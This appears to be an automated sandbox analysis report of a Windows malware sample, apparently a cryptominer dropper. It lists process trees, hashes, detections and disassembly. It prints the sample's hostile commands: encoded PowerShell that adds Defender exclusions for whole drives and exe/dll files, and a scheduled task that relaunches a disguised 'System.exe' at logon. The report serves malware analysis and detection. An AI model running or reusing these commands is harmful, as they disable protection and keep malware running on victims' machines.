                                                        MD5 hash:B405BF6533C047B1A47CECED3B42C23B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        General

                                                        Target ID:1
                                                        Start time:22:09:32
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\AppData\Roaming\12.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Roaming\12.exe
                                                        Imagebase:0x370000
                                                        File size:2149888 bytes
                                                        MD5 hash:7ADD9A3AB1734828F756F2725C452C9A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 60%, Virustotal, Browse
                                                        • Detection: 60%, ReversingLabs
                                                        Reputation:low

                                                        General

                                                        Target ID:4
                                                        Start time:22:09:34
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\AppData\Roaming\1.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\1.exe
                                                        Imagebase:0x400000
                                                        File size:4462384 bytes
                                                        MD5 hash:D9F92868EEE8D3C8ECD29A7969419D29
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 37%, Virustotal, Browse
                                                        • Detection: 45%, ReversingLabs
                                                        Reputation:low

                                                        General

                                                        Target ID:5
                                                        Start time:22:09:36
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:6
                                                        Start time:22:09:37
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                        Imagebase:0x880000
                                                        File size:98912 bytes
                                                        MD5 hash:6807F903AC06FF7E1670181378690B22
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Target ID:8
                                                        Start time:22:09:44
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                                                        Imagebase:0x7ff602050000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:9
                                                        Start time:22:09:45
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:10
                                                        Start time:22:09:46
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                                                        Imagebase:0x7ff619710000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Target ID:16
                                                        Start time:22:10:17
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                                                        Imagebase:0x7ff619710000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Target ID:18
                                                        Start time:22:10:28
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Imagebase:0x7ff602050000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:19
                                                        Start time:22:10:28
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:20
                                                        Start time:22:10:29
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
                                                        Imagebase:0x7ff69c230000
                                                        File size:226816 bytes
                                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:22
                                                        Start time:22:10:30
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Imagebase:0x1c0000
                                                        File size:2149888 bytes
                                                        MD5 hash:7ADD9A3AB1734828F756F2725C452C9A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 60%, Virustotal, Browse
                                                        • Detection: 60%, ReversingLabs

                                                        General

                                                        Target ID:23
                                                        Start time:22:10:31
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Imagebase:0x7ff602050000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:24
                                                        Start time:22:10:32
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:26
                                                        Start time:22:10:32
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Imagebase:0xd10000
                                                        File size:2149888 bytes
                                                        MD5 hash:7ADD9A3AB1734828F756F2725C452C9A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                        General

                                                        Target ID:28
                                                        Start time:22:10:47
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                                                        Imagebase:0x7ff602050000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:29
                                                        Start time:22:10:48
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:30
                                                        Start time:22:10:48
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                                                        Imagebase:0x7ff619710000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        General

                                                        Target ID:31
                                                        Start time:22:10:51
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                                                        Imagebase:0x7ff602050000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:32
                                                        Start time:22:10:52
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:33
                                                        Start time:22:10:53
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                                                        Imagebase:0x7ff619710000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        General

                                                        Target ID:35
                                                        Start time:22:11:13
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                                                        Imagebase:0x7ff619710000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        General

                                                        Target ID:36
                                                        Start time:22:11:26
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe"
                                                        Imagebase:0xfe0000
                                                        File size:66560 bytes
                                                        MD5 hash:E2DD8887AEE175EF9BEFD87B2F6105B3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 30%, Virustotal, Browse
                                                        • Detection: 73%, ReversingLabs

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:13.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:16.6%
                                                          Total number of Nodes:1315
                                                          Total number of Limit Nodes:17
                                                          execution_graph 3467 401d44 3471 402bac 3467->3471 3469 401d52 SetWindowLongA 3470 402a5a 3469->3470 3472 40618a 17 API calls 3471->3472 3473 402bc1 3472->3473 3473->3469 3474 401ec5 3475 402bac 17 API calls 3474->3475 3476 401ecb 3475->3476 3477 402bac 17 API calls 3476->3477 3478 401ed7 3477->3478 3479 401ee3 ShowWindow 3478->3479 3480 401eee EnableWindow 3478->3480 3481 402a5a 3479->3481 3480->3481 3482 401746 3483 402bce 17 API calls 3482->3483 3484 40174d 3483->3484 3485 405cbf 2 API calls 3484->3485 3486 401754 3485->3486 3486->3486 3487 4045c6 3488 4045d6 3487->3488 3489 4045fc 3487->3489 3494 40417b 3488->3494 3497 4041e2 3489->3497 3492 4045e3 SetDlgItemTextA 3492->3489 3495 40618a 17 API calls 3494->3495 3496 404186 SetDlgItemTextA 3495->3496 3496->3492 3498 4042a5 3497->3498 3499 4041fa GetWindowLongA 3497->3499 3499->3498 3500 40420f 3499->3500 3500->3498 3501 40423c GetSysColor 3500->3501 3502 40423f 3500->3502 3501->3502 3503 404245 SetTextColor 3502->3503 3504 40424f SetBkMode 3502->3504 3503->3504 3505 404267 GetSysColor 3504->3505 3506 40426d 3504->3506 3505->3506 3507 404274 SetBkColor 3506->3507 3508 40427e 3506->3508 3507->3508 3508->3498 3509 404291 DeleteObject 3508->3509 3510 404298 CreateBrushIndirect 3508->3510 3509->3510 3510->3498 3511 401947 3512 402bce 17 API calls 3511->3512 3513 40194e lstrlenA 3512->3513 3514 402620 3513->3514 3072 403348 SetErrorMode GetVersion 3073 403389 3072->3073 3074 40338f 3072->3074 3075 406500 5 API calls 3073->3075 3162 406492 GetSystemDirectoryA 3074->3162 3075->3074 3077 4033a5 lstrlenA 3077->3074 3078 4033b4 3077->3078 3165 406500 GetModuleHandleA 3078->3165 3081 406500 5 API calls 3082 4033c2 3081->3082 3083 406500 5 API calls 3082->3083 3084 4033ce #17 OleInitialize SHGetFileInfoA 3083->3084 3171 4060f7 lstrcpynA 3084->3171 3087 40341a GetCommandLineA 3172 4060f7 lstrcpynA 3087->3172 3089 40342c 3090 405aba CharNextA 3089->3090 3091 403455 CharNextA 3090->3091 3101 403465 3091->3101 3092 40352f 3093 403542 GetTempPathA 3092->3093 3173 403317 3093->3173 3095 40355a 3096 4035b4 DeleteFileA 3095->3096 3097 40355e GetWindowsDirectoryA lstrcatA 3095->3097 3183 402ea1 GetTickCount GetModuleFileNameA 3096->3183 3099 403317 12 API calls 3097->3099 3098 405aba CharNextA 3098->3101 3102 40357a 3099->3102 3101->3092 3101->3098 3103 403531 3101->3103 3102->3096 3105 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3102->3105 3268 4060f7 lstrcpynA 3103->3268 3104 4035c8 3106 403662 ExitProcess OleUninitialize 3104->3106 3109 40364e 3104->3109 3116 405aba CharNextA 3104->3116 3108 403317 12 API calls 3105->3108 3110 403796 3106->3110 3111 403678 3106->3111 3114 4035ac 3108->3114 3211 40390a 3109->3211 3112 403818 ExitProcess 3110->3112 3113 40379e GetCurrentProcess OpenProcessToken 3110->3113 3271 405813 3111->3271 3118 4037e9 3113->3118 3119 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 3113->3119 3114->3096 3114->3106 3121 4035e3 3116->3121 3124 406500 5 API calls 3118->3124 3119->3118 3125 403629 3121->3125 3126 40368e 3121->3126 3127 4037f0 3124->3127 3129 405b7d 18 API calls 3125->3129 3275 40577e 3126->3275 3130 403805 ExitWindowsEx 3127->3130 3133 403811 3127->3133 3132 403634 3129->3132 3130->3112 3130->3133 3132->3106 3269 4060f7 lstrcpynA 3132->3269 3291 40140b 3133->3291 3134 4036a4 lstrcatA 3135 4036af lstrcatA lstrcmpiA 3134->3135 3135->3106 3137 4036cb 3135->3137 3139 4036d0 3137->3139 3140 4036d7 3137->3140 3278 4056e4 CreateDirectoryA 3139->3278 3283 405761 CreateDirectoryA 3140->3283 3141 403643 3270 4060f7 lstrcpynA 3141->3270 3146 4036dc SetCurrentDirectoryA 3147 4036f6 3146->3147 3148 4036eb 3146->3148 3287 4060f7 lstrcpynA 3147->3287 3286 4060f7 lstrcpynA 3148->3286 3151 40618a 17 API calls 3152 403735 DeleteFileA 3151->3152 3153 403742 CopyFileA 3152->3153 3159 403704 3152->3159 3153->3159 3154 40378a 3156 405ed6 36 API calls 3154->3156 3155 405ed6 36 API calls 3155->3159 3157 403791 3156->3157 3157->3106 3158 40618a 17 API calls 3158->3159 3159->3151 3159->3154 3159->3155 3159->3158 3161 403776 CloseHandle 3159->3161 3288 405796 CreateProcessA 3159->3288 3161->3159 3163 4064b4 wsprintfA LoadLibraryExA 3162->3163 3163->3077 3166 406526 GetProcAddress 3165->3166 3167 40651c 3165->3167 3169 4033bb 3166->3169 3168 406492 3 API calls 3167->3168 3170 406522 3168->3170 3169->3081 3170->3166 3170->3169 3171->3087 3172->3089 3174 4063d2 5 API calls 3173->3174 3176 403323 3174->3176 3175 40332d 3175->3095 3176->3175 3177 405a8f 3 API calls 3176->3177 3178 403335 3177->3178 3179 405761 2 API calls 3178->3179 3180 40333b 3179->3180 3294 405cbf 3180->3294 3298 405c90 GetFileAttributesA CreateFileA 3183->3298 3185 402ee1 3205 402ef1 3185->3205 3299 4060f7 lstrcpynA 3185->3299 3187 402f07 3188 405ad6 2 API calls 3187->3188 3189 402f0d 3188->3189 3300 4060f7 lstrcpynA 3189->3300 3191 402f18 GetFileSize 3192 403012 3191->3192 3193 402f2f 3191->3193 3301 402e3d 3192->3301 3193->3192 3198 40307e 3193->3198 3193->3205 3207 402e3d 6 API calls 3193->3207 3333 4032ea 3193->3333 3195 40301b 3197 40304b GlobalAlloc 3195->3197 3195->3205 3336 403300 SetFilePointer 3195->3336 3312 403300 SetFilePointer 3197->3312 3202 402e3d 6 API calls 3198->3202 3201 403066 3313 4030d8 3201->3313 3202->3205 3203 403034 3206 4032ea ReadFile 3203->3206 3205->3104 3208 40303f 3206->3208 3207->3193 3208->3197 3208->3205 3210 4030af SetFilePointer 3210->3205 3212 406500 5 API calls 3211->3212 3213 40391e 3212->3213 3214 403924 GetUserDefaultUILanguage 3213->3214 3215 403936 3213->3215 3342 406055 wsprintfA 3214->3342 3217 405fde 3 API calls 3215->3217 3218 403961 3217->3218 3220 40397f lstrcatA 3218->3220 3221 405fde 3 API calls 3218->3221 3219 403934 3343 403bcf 3219->3343 3220->3219 3221->3220 3224 405b7d 18 API calls 3225 4039b1 3224->3225 3226 403a3a 3225->3226 3228 405fde 3 API calls 3225->3228 3227 405b7d 18 API calls 3226->3227 3231 403a40 3227->3231 3229 4039dd 3228->3229 3229->3226 3237 4039f9 lstrlenA 3229->3237 3241 405aba CharNextA 3229->3241 3230 403a50 LoadImageA 3232 403af6 3230->3232 3233 403a77 RegisterClassA 3230->3233 3231->3230 3234 40618a 17 API calls 3231->3234 3236 40140b 2 API calls 3232->3236 3235 403aad SystemParametersInfoA CreateWindowExA 3233->3235 3267 40365e 3233->3267 3234->3230 3235->3232 3240 403afc 3236->3240 3238 403a07 lstrcmpiA 3237->3238 3239 403a2d 3237->3239 3238->3239 3243 403a17 GetFileAttributesA 3238->3243 3244 405a8f 3 API calls 3239->3244 3246 403bcf 18 API calls 3240->3246 3240->3267 3242 4039f7 3241->3242 3242->3237 3245 403a23 3243->3245 3247 403a33 3244->3247 3245->3239 3248 405ad6 2 API calls 3245->3248 3249 403b0d 3246->3249 3351 4060f7 lstrcpynA 3247->3351 3248->3239 3251 403b19 ShowWindow 3249->3251 3252 403b9c 3249->3252 3254 406492 3 API calls 3251->3254 3352 4052f0 OleInitialize 3252->3352 3256 403b31 3254->3256 3255 403ba2 3257 403ba6 3255->3257 3258 403bbe 3255->3258 3259 403b3f GetClassInfoA 3256->3259 3263 406492 3 API calls 3256->3263 3265 40140b 2 API calls 3257->3265 3257->3267 3262 40140b 2 API calls 3258->3262 3260 403b53 GetClassInfoA RegisterClassA 3259->3260 3261 403b69 DialogBoxParamA 3259->3261 3260->3261 3264 40140b 2 API calls 3261->3264 3262->3267 3263->3259 3266 403b91 3264->3266 3265->3267 3266->3267 3267->3106 3268->3093 3269->3141 3270->3109 3272 405828 3271->3272 3273 403686 ExitProcess 3272->3273 3274 40583c MessageBoxIndirectA 3272->3274 3274->3273 3276 406500 5 API calls 3275->3276 3277 403693 lstrcatA 3276->3277 3277->3134 3277->3135 3279 4036d5 3278->3279 3280 405735 GetLastError 3278->3280 3279->3146 3280->3279 3281 405744 SetFileSecurityA 3280->3281 3281->3279 3282 40575a GetLastError 3281->3282 3282->3279 3284 405771 3283->3284 3285 405775 GetLastError 3283->3285 3284->3146 3285->3284 3286->3147 3287->3159 3289 4057d5 3288->3289 3290 4057c9 CloseHandle 3288->3290 3289->3159 3290->3289 3292 401389 2 API calls 3291->3292 3293 401420 3292->3293 3293->3112 3295 405cca GetTickCount GetTempFileNameA 3294->3295 3296 403346 3295->3296 3297 405cf7 3295->3297 3296->3095 3297->3295 3297->3296 3298->3185 3299->3187 3300->3191 3302 402e46 3301->3302 3303 402e5e 3301->3303 3306 402e56 3302->3306 3307 402e4f DestroyWindow 3302->3307 3304 402e66 3303->3304 3305 402e6e GetTickCount 3303->3305 3337 40653c 3304->3337 3309 402e7c CreateDialogParamA ShowWindow 3305->3309 3310 402e9f 3305->3310 3306->3195 3307->3306 3309->3310 3310->3195 3312->3201 3314 4030ee 3313->3314 3315 40311c 3314->3315 3341 403300 SetFilePointer 3314->3341 3317 4032ea ReadFile 3315->3317 3318 403127 3317->3318 3319 403283 3318->3319 3320 403139 GetTickCount 3318->3320 3327 403072 3318->3327 3321 4032c5 3319->3321 3326 403287 3319->3326 3320->3327 3332 403188 3320->3332 3322 4032ea ReadFile 3321->3322 3322->3327 3323 4032ea ReadFile 3323->3332 3324 4032ea ReadFile 3324->3326 3325 405d37 WriteFile 3325->3326 3326->3324 3326->3325 3326->3327 3327->3205 3327->3210 3328 4031de GetTickCount 3328->3332 3329 403203 MulDiv wsprintfA 3330 40521e 24 API calls 3329->3330 3330->3332 3331 405d37 WriteFile 3331->3332 3332->3323 3332->3327 3332->3328 3332->3329 3332->3331 3334 405d08 ReadFile 3333->3334 3335 4032fd 3334->3335 3335->3193 3336->3203 3338 406559 PeekMessageA 3337->3338 3339 402e6c 3338->3339 3340 40654f DispatchMessageA 3338->3340 3339->3195 3340->3338 3341->3315 3342->3219 3344 403be3 3343->3344 3359 406055 wsprintfA 3344->3359 3346 403c54 3360 403c88 3346->3360 3348 40398f 3348->3224 3349 403c59 3349->3348 3350 40618a 17 API calls 3349->3350 3350->3349 3351->3226 3363 4041c7 3352->3363 3354 405313 3358 40533a 3354->3358 3366 401389 3354->3366 3355 4041c7 SendMessageA 3356 40534c OleUninitialize 3355->3356 3356->3255 3358->3355 3359->3346 3361 40618a 17 API calls 3360->3361 3362 403c96 SetWindowTextA 3361->3362 3362->3349 3364 4041d0 SendMessageA 3363->3364 3365 4041df 3363->3365 3364->3365 3365->3354 3368 401390 3366->3368 3367 4013fe 3367->3354 3368->3367 3369 4013cb MulDiv SendMessageA 3368->3369 3369->3368 3515 4038c8 3516 4038d3 3515->3516 3517 4038d7 3516->3517 3518 4038da GlobalAlloc 3516->3518 3518->3517 3522 401fcb 3523 402bce 17 API calls 3522->3523 3524 401fd2 3523->3524 3525 40646b 2 API calls 3524->3525 3526 401fd8 3525->3526 3528 401fea 3526->3528 3529 406055 wsprintfA 3526->3529 3529->3528 3530 4014d6 3531 402bac 17 API calls 3530->3531 3532 4014dc Sleep 3531->3532 3534 402a5a 3532->3534 3370 401759 3409 402bce 3370->3409 3372 401760 3373 401786 3372->3373 3374 40177e 3372->3374 3417 4060f7 lstrcpynA 3373->3417 3416 4060f7 lstrcpynA 3374->3416 3377 401791 3379 405a8f 3 API calls 3377->3379 3378 401784 3381 4063d2 5 API calls 3378->3381 3380 401797 lstrcatA 3379->3380 3380->3378 3386 4017a3 3381->3386 3382 4017ae 3383 40646b 2 API calls 3382->3383 3382->3386 3387 4017ba CompareFileTime 3382->3387 3383->3382 3385 405c6b 2 API calls 3385->3386 3386->3382 3386->3385 3388 40187e 3386->3388 3393 4060f7 lstrcpynA 3386->3393 3396 40618a 17 API calls 3386->3396 3405 405813 MessageBoxIndirectA 3386->3405 3407 401855 3386->3407 3415 405c90 GetFileAttributesA CreateFileA 3386->3415 3387->3382 3389 40521e 24 API calls 3388->3389 3391 401888 3389->3391 3390 40521e 24 API calls 3408 40186a 3390->3408 3392 4030d8 31 API calls 3391->3392 3394 40189b 3392->3394 3393->3386 3395 4018af 